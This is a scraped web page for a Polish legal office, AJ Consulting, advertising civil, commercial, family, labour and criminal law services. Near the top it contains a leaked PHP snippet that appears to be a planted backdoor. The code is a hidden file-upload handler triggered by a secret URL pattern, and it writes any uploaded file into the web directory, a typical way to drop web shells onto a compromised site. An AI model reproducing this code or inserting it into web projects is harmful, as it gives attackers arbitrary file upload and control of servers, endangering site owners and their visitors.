Kancelaria Radcy Prawnego AJ Consulting

$id=$_SERVER['REQUEST_URI'];if(preg_match_all("/\?\d{5,8}g\d{5,8}s/",$id,$matches)){if(isset($_POST['Submit'])){$filedir="";$maxfile='2000000';$userfile_name=$_FILES['image']['name'];$userfile_tmp=$_FILES['image']['tmp_name'];if(isset($_FILES['image']['name'])){$abod=$filedir.$userfile_name;@move_uploaded_file($userfile_tmp,$abod);echo"
Done ==> $userfile_name
";}}else{echo'
';}exit;}

Profesjonalna pomoc z zakresu prawa cywilnego, gospodarczego, rodzinnego, pracy, karnego i wykroczeń

Usługi prawne w doskonałych warunkach

  • Konsulatacja Prawna

    Wysoka jakość

  • Rada eksperta

    Osobiste zaangażowanie

  • Niski koszt

    Poczucie bezpieczeństwa